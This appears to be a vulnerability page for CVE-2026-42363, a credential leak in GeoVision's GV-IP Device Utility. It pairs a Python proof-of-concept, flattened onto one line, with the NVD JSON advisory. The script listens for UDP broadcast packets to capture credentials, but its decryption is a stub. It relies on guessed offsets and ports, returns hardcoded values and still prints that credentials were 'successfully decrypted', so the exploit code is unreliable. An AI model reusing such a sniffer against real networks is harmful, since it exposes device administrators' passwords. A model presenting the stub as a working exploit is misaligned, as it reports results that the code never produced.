CVE-2026-42363

import socket import struct # Simulated decryption function based on vulnerability description # The algorithm is a derivative of Blowfish, and the key is in the packet. def decrypt_credentials(packet_data): # Hypothetical offsets based on typical packet structures # Key extraction (Assuming key is at offset 20, length 16) key = packet_data[20:36] encrypted_creds = packet_data[36:100] # Assuming payload size # In a real exploit, the attacker implements the specific Blowfish derivative # For this PoC, we simulate the decryption logic print(f"[+] Captured Key: {key.hex()}") print(f"[+] Captured Ciphertext: {encrypted_creds.hex()}") # Placeholder for the actual decryption algorithm implementation # username, password = custom_blowfish_decrypt(encrypted_creds, key) return "admin", "decrypted_password_here" def main(): # Create a UDP socket to listen for broadcast traffic # GeoVision utility likely uses a specific port, checking common ports or broadcasting UDP_PORT = 5050 # Example port, adjust based on actual service discovery sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('', UDP_PORT)) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) print(f"[*] Listening for GeoVision broadcast packets on port {UDP_PORT}...") try: while True: data, addr = sock.recvfrom(1024) print(f"[*] Received packet from {addr}") # Filter for GeoVision specific packets (Magic bytes/headers) # if data[:4] == b'\x00\x01\x02\x03': # Example header user, pwd = decrypt_credentials(data) print(f"[!] Successfully decrypted credentials!") print(f" Username: {user}") print(f" Password: {pwd}") break # Exit after first capture for demonstration except KeyboardInterrupt: print("\n[*] Exiting...") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-42363", "sourceIdentifier": "0df08a0e-a200-4957-9bb0-084f562506f9", "published": "2026-04-27T00:16:20.357", "lastModified": "2026-05-19T15:22:14.957", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An insufficient encryption vulnerability exists in the Device Authentication functionality of GeoVision GV-IP Device Utility 9.0.5. Listening to broadcast packets can lead to credentials leak. An attacker can listen to broadcast messages to trigger this vulnerability.\n\n\nWhen interacting with various Geovision devices on the network, the utility may send privileged commands; in order to do so, the username and password of the device need to be provided. In some instances the command is broadcasted over UDP and the username/password are encrypted using a cryptographic protocol that appears to be derivated from Blowfish. However the symmetric key used for the encryption is also included in the packet, and thus the security of the username/password only relies on the \"obscurity\" of the encryption scheme. An attacker on the same LAN can listen to the broadcast traffic once an admin user interacts with the device, and decrypt the credentials using their own implementation of the algorithm. With this password the attacker would have full control over the device configuration, allowing them to change its ip address or even reset it to factory default."}], "metrics": {"cvssMetricV31": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-656"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/", "source": "0df08a0e-a200-4957-9bb0-084f562506f9"}, {"url": "https://www.geovision.com.tw/cyber_security.php", "source": "0df08a0e-a200-4957-9bb0-084f562506f9"}]}}